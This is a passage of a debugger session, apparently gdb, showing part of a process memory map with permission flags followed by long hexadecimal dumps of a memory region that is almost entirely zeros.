0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
(gdb) x/96x 0x22000
0x22000: 0x00000000 0x00000000 0x00000000 0x00000000
0x22010: 0x00000000 0x00000000 0x00000000 0x00000000
0x22020: 0x00000000 0x00000000 0x00000000 0x00000000
0x22030: 0x00000000 0x00000000 0x00000000 0x00000000
0x22040: 0x00000000 0x00000000 0x00000000 0x00000000
0x22050: 0x00000000 0x00000000 0x00000000 0x00000000
0x22060: 0x00000000 0x00000000 0x00000000 0x00000000
0x22070: 0x00000000 0x00000000 0x00000000 0x00000000
0x22080: 0x00000000 0x00000000 0x00000000 0x00000000
0x22090: 0x00000000 0x00000000 0x00000000 0x00000000
0x220a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x220f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22100: 0x00000000 0x00000000 0x00000000 0x00000000
0x22110: 0x00000000 0x00000000 0x00000000 0x00000000
0x22120: 0x00000000 0x00000000 0x00000000 0x00000000
0x22130: 0x00000000 0x00000000 0x00000000 0x00000000
0x22140: 0x00000000 0x00000000 0x00000000 0x00000000
0x22150: 0x00000000 0x00000000 0x00000000 0x00000000
0x22160: 0x00000000 0x00000000 0x00000000 0x00000000
0x22170: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22180: 0x00000000 0x00000000 0x00000000 0x00000000
0x22190: 0x00000000 0x00000000 0x00000000 0x00000000
0x221a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x221f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22200: 0x00000000 0x00000000 0x00000000 0x00000000
0x22210: 0x00000000 0x00000000 0x00000000 0x00000000
0x22220: 0x00000000 0x00000000 0x00000000 0x00000000
0x22230: 0x00000000 0x00000000 0x00000000 0x00000000
0x22240: 0x00000000 0x00000000 0x00000000 0x00000000
0x22250: 0x00000000 0x00000000 0x00000000 0x00000000
0x22260: 0x00000000 0x00000000 0x00000000 0x00000000
0x22270: 0x00000000 0x00000000 0x00000000 0x00000000
0x22280: 0x00000000 0x00000000 0x00000000 0x00000000
0x22290: 0x00000000 0x00000000 0x00000000 0x00000000
0x222a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x222f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22300: 0x00000000 0x00000000 0x00000000 0x00000000
0x22310: 0x00000000 0x00000000 0x00000000 0x00000000
0x22320: 0x00000000 0x00000000 0x00000000 0x00000000
0x22330: 0x00000000 0x00000000 0x00000000 0x00000000
0x22340: 0x00000000 0x00000000 0x00000000 0x00000000
0x22350: 0x00000000 0x00000000 0x00000000 0x00000000
0x22360: 0x00000000 0x00000000 0x00000000 0x00000000
0x22370: 0x00000000 0x00000000 0x00000000 0x00000000
0x22380: 0x00000000 0x00000000 0x00000000 0x00000000
0x22390: 0x00000000 0x00000000 0x00000000 0x00000000
0x223a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x223f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22400: 0x00000000 0x00000000 0x00000000 0x00000000
0x22410: 0x00000000 0x00000000 0x00000000 0x00000000
0x22420: 0x00000000 0x00000000 0x00000000 0x00000000
0x22430: 0x00000000 0x00000000 0x00000000 0x00000000
0x22440: 0x00000000 0x00000000 0x00000000 0x00000000
0x22450: 0x00000000 0x00000000 0x00000000 0x00000000
0x22460: 0x00000000 0x00000000 0x00000000 0x00000000
0x22470: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22480: 0x00000000 0x00000000 0x00000000 0x00000000
0x22490: 0x00000000 0x00000000 0x00000000 0x00000000
0x224a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x224f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22500: 0x00000000 0x00000000 0x00000000 0x00000000
0x22510: 0x00000000 0x00000000 0x00000000 0x00000000
0x22520: 0x00000000 0x00000000 0x00000000 0x00000000
0x22530: 0x00000000 0x00000000 0x00000000 0x00000000
0x22540: 0x00000000 0x00000000 0x00000000 0x00000000
0x22550: 0x00000000 0x00000000 0x00000000 0x00000000
0x22560: 0x00000000 0x00000000 0x00000000 0x00000000
0x22570: 0x00000000 0x00000000 0x00000000 0x00000000
0x22580: 0x00000000 0x00000000 0x00000000 0x00000000
0x22590: 0x00000000 0x00000000 0x00000000 0x00000000
0x225a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x225f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22600: 0x00000000 0x00000000 0x00000000 0x00000000
0x22610: 0x00000000 0x00000000 0x00000000 0x00000000
0x22620: 0x00000000 0x00000000 0x00000000 0x00000000
0x22630: 0x00000000 0x00000000 0x00000000 0x00000000
0x22640: 0x00000000 0x00000000 0x00000000 0x00000000
0x22650: 0x00000000 0x00000000 0x00000000 0x00000000
0x22660: 0x00000000 0x00000000 0x00000000 0x00000000
0x22670: 0x00000000 0x00000000 0x00000000 0x00000000
0x22680: 0x00000000 0x00000000 0x00000000 0x00000000
0x22690: 0x00000000 0x00000000 0x00000000 0x00000000
0x226a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x226f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22700: 0x00000000 0x00000000 0x00000000 0x00000000
0x22710: 0x00000000 0x00000000 0x00000000 0x00000000
0x22720: 0x00000000 0x00000000 0x00000000 0x00000000
0x22730: 0x00000000 0x00000000 0x00000000 0x00000000
0x22740: 0x00000000 0x00000000 0x00000000 0x00000000
0x22750: 0x00000000 0x00000000 0x00000000 0x00000000
0x22760: 0x00000000 0x00000000 0x00000000 0x00000000
0x22770: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22780: 0x00000000 0x00000000 0x00000000 0x00000000
0x22790: 0x00000000 0x00000000 0x00000000 0x00000000
0x227a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x227f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22800: 0x00000000 0x00000000 0x00000000 0x00000000
0x22810: 0x00000000 0x00000000 0x00000000 0x00000000
0x22820: 0x00000000 0x00000000 0x00000000 0x00000000
0x22830: 0x00000000 0x00000000 0x00000000 0x00000000
0x22840: 0x00000000 0x00000000 0x00000000 0x00000000
0x22850: 0x00000000 0x00000000 0x00000000 0x00000000
0x22860: 0x00000000 0x00000000 0x00000000 0x00000000
0x22870: 0x00000000 0x00000000 0x00000000 0x00000000
0x22880: 0x00000000 0x00000000 0x00000000 0x00000000
0x22890: 0x00000000 0x00000000 0x00000000 0x00000000
0x228a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x228f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22900: 0x00000000 0x00000000 0x00000000 0x00000000
0x22910: 0x00000000 0x00000000 0x00000000 0x00000000
0x22920: 0x00000000 0x00000000 0x00000000 0x00000000
0x22930: 0x00000000 0x00000000 0x00000000 0x00000000
0x22940: 0x00000000 0x00000000 0x00000000 0x00000000
0x22950: 0x00000000 0x00000000 0x00000000 0x00000000
0x22960: 0x00000000 0x00000000 0x00000000 0x00000000
0x22970: 0x00000000 0x00000000 0x00000000 0x00000000
0x22980: 0x00000000 0x00000000 0x00000000 0x00000000
0x22990: 0x00000000 0x00000000 0x00000000 0x00000000
0x229a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x229f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a30: 0x00000001 0x00000000 0x00000000 0x00000000
0x22a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22a90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22aa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22af0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22be0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22bf0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22eb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ec0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ed0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ee0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ef0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x22f00: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f10: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f20: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f30: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f40: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f50: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f60: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f70: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f80: 0x00000000 0x00000000 0x00000000 0x00000000
0x22f90: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22fe0: 0x00000000 0x00000000 0x00000000 0x00000000
0x22ff0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23000: 0x00000000 0x00000000 0x00000000 0x00000000
0x23010: 0x00000000 0x00000000 0x00000000 0x00000000
0x23020: 0x00000000 0x00000000 0x00000000 0x00000000
0x23030: 0x00000000 0x00000000 0x00000000 0x00000000
0x23040: 0x00000000 0x00000000 0x00000000 0x00000000
0x23050: 0x00000000 0x00000000 0x00000000 0x00000000
0x23060: 0x00000000 0x00000000 0x00000000 0x00000000
0x23070: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23080: 0x00000000 0x00000000 0x00000000 0x00000000
0x23090: 0x00000000 0x00000000 0x00000000 0x00000000
0x230a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x230f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23100: 0x00000000 0x00000000 0x00000000 0x00000000
0x23110: 0x00000000 0x00000000 0x00000000 0x00000000
0x23120: 0x00000000 0x00000000 0x00000000 0x00000000
0x23130: 0x00000000 0x00000000 0x00000000 0x00000000
0x23140: 0x00000000 0x00000000 0x00000000 0x00000000
0x23150: 0x00000000 0x00000000 0x00000000 0x00000000
0x23160: 0x00000000 0x00000000 0x00000000 0x00000000
0x23170: 0x00000000 0x00000000 0x00000000 0x00000000
0x23180: 0x00000000 0x00000000 0x00000000 0x00000000
0x23190: 0x00000000 0x00000000 0x00000000 0x00000000
0x231a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x231f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23200: 0x00000000 0x00000000 0x00000000 0x00000000
0x23210: 0x00000000 0x00000000 0x00000000 0x00000000
0x23220: 0x00000000 0x00000000 0x00000000 0x00000000
0x23230: 0x00000000 0x00000000 0x00000000 0x00000000
0x23240: 0x00000000 0x00000000 0x00000000 0x00000000
0x23250: 0x00000000 0x00000000 0x00000000 0x00000000
0x23260: 0x00000000 0x00000000 0x00000000 0x00000000
0x23270: 0x00000000 0x00000000 0x00000000 0x00000000
0x23280: 0x00000000 0x00000000 0x00000000 0x00000000
0x23290: 0x00000000 0x00000000 0x00000000 0x00000000
0x232a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x232f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23300: 0x00000000 0x00000000 0x00000000 0x00000000
0x23310: 0x00000000 0x00000000 0x00000000 0x00000000
0x23320: 0x00000000 0x00000000 0x00000000 0x00000000
0x23330: 0x00000000 0x00000000 0x00000000 0x00000000
0x23340: 0x00000000 0x00000000 0x00000000 0x00000000
0x23350: 0x00000000 0x00000000 0x00000000 0x00000000
0x23360: 0x00000000 0x00000000 0x00000000 0x00000000
0x23370: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23380: 0x00000000 0x00000000 0x00000000 0x00000000
0x23390: 0x00000000 0x00000000 0x00000000 0x00000000
0x233a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x233f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23400: 0x00000000 0x00000000 0x00000000 0x00000000
0x23410: 0x00000000 0x00000000 0x00000000 0x00000000
0x23420: 0x00000000 0x00000000 0x00000000 0x00000000
0x23430: 0x00000000 0x00000000 0x00000000 0x00000000
0x23440: 0x00000000 0x00000000 0x00000000 0x00000000
0x23450: 0x00000000 0x00000000 0x00000000 0x00000000
0x23460: 0x00000000 0x00000000 0x00000000 0x00000000
0x23470: 0x00000000 0x00000000 0x00000000 0x00000000
0x23480: 0x00000000 0x00000000 0x00000000 0x00000000
0x23490: 0x00000000 0x00000000 0x00000000 0x00000000
0x234a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x234f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23500: 0x00000000 0x00000000 0x00000000 0x00000000
0x23510: 0x00000000 0x00000000 0x00000000 0x00000000
0x23520: 0x00000000 0x00000000 0x00000000 0x00000000
0x23530: 0x00000000 0x00000000 0x00000000 0x00000000
0x23540: 0x00000000 0x00000000 0x00000000 0x00000000
0x23550: 0x00000000 0x00000000 0x00000000 0x00000000
0x23560: 0x00000000 0x00000000 0x00000000 0x00000000
0x23570: 0x00000000 0x00000000 0x00000000 0x00000000
0x23580: 0x00000000 0x00000000 0x00000000 0x00000000
0x23590: 0x00000000 0x00000000 0x00000000 0x00000000
0x235a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x235f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23600: 0x00000000 0x00000000 0x00000000 0x00000000
0x23610: 0x00000000 0x00000000 0x00000000 0x00000000
0x23620: 0x00000000 0x00000000 0x00000000 0x00000000
0x23630: 0x00000000 0x00000000 0x00000000 0x00000000
0x23640: 0x00000000 0x00000000 0x00000000 0x00000000
0x23650: 0x00000000 0x00000000 0x00000000 0x00000000
0x23660: 0x00000000 0x00000000 0x00000000 0x00000000
0x23670: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23680: 0x00000000 0x00000000 0x00000000 0x00000000
0x23690: 0x00000000 0x00000000 0x00000000 0x00000000
0x236a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x236f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23700: 0x00000000 0x00000000 0x00000000 0x00000000
0x23710: 0x00000000 0x00000000 0x00000000 0x00000000
0x23720: 0x00000000 0x00000000 0x00000000 0x00000000
0x23730: 0x00000000 0x00000000 0x00000000 0x00000000
0x23740: 0x00000000 0x00000000 0x00000000 0x00000000
0x23750: 0x00000000 0x00000000 0x00000000 0x00000000
0x23760: 0x00000000 0x00000000 0x00000000 0x00000000
0x23770: 0x00000000 0x00000000 0x00000000 0x00000000
0x23780: 0x00000000 0x00000000 0x00000000 0x00000000
0x23790: 0x00000000 0x00000000 0x00000000 0x00000000
0x237a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x237f0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23800: 0x00000000 0x00000000 0x00000000 0x00000000
0x23810: 0x00000000 0x00000000 0x00000000 0x00000000
0x23820: 0x00000000 0x00000000 0x00000000 0x00000000
0x23830: 0x00000000 0x00000000 0x00000000 0x00000000
0x23840: 0x00000000 0x00000000 0x00000000 0x00000000
0x23850: 0x00000000 0x00000000 0x00000000 0x00000000
0x23860: 0x00000000 0x00000000 0x00000000 0x00000000
0x23870: 0x00000000 0x00000000 0x00000000 0x00000000
0x23880: 0x00000000 0x00000000 0x00000000 0x00000000
0x23890: 0x00000000 0x00000000 0x00000000 0x00000000
0x238a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x238f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23900: 0x00000000 0x00000000 0x00000000 0x00000000
0x23910: 0x00000000 0x00000000 0x00000000 0x00000000
0x23920: 0x00000000 0x00000000 0x00000000 0x00000000
0x23930: 0x00000000 0x00000000 0x00000000 0x00000000
0x23940: 0x00000000 0x00000000 0x00000000 0x00000000
0x23950: 0x00000000 0x00000000 0x00000000 0x00000000
0x23960: 0x00000000 0x00000000 0x00000000 0x00000000
0x23970: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23980: 0x00000000 0x00000000 0x00000000 0x00000000
0x23990: 0x00000000 0x00000000 0x00000000 0x00000000
0x239a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x239f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23a90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23aa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ab0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ac0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ad0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ae0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23af0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23b00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23b90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ba0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23be0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23bf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c70: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0x23c80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23c90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ca0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23ce0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23cf0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d00: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d10: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d20: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d30: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d40: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d50: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d60: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x23d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x23da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x23dd0: 0x00000000 0x00000000 0x00000000 0x00000000
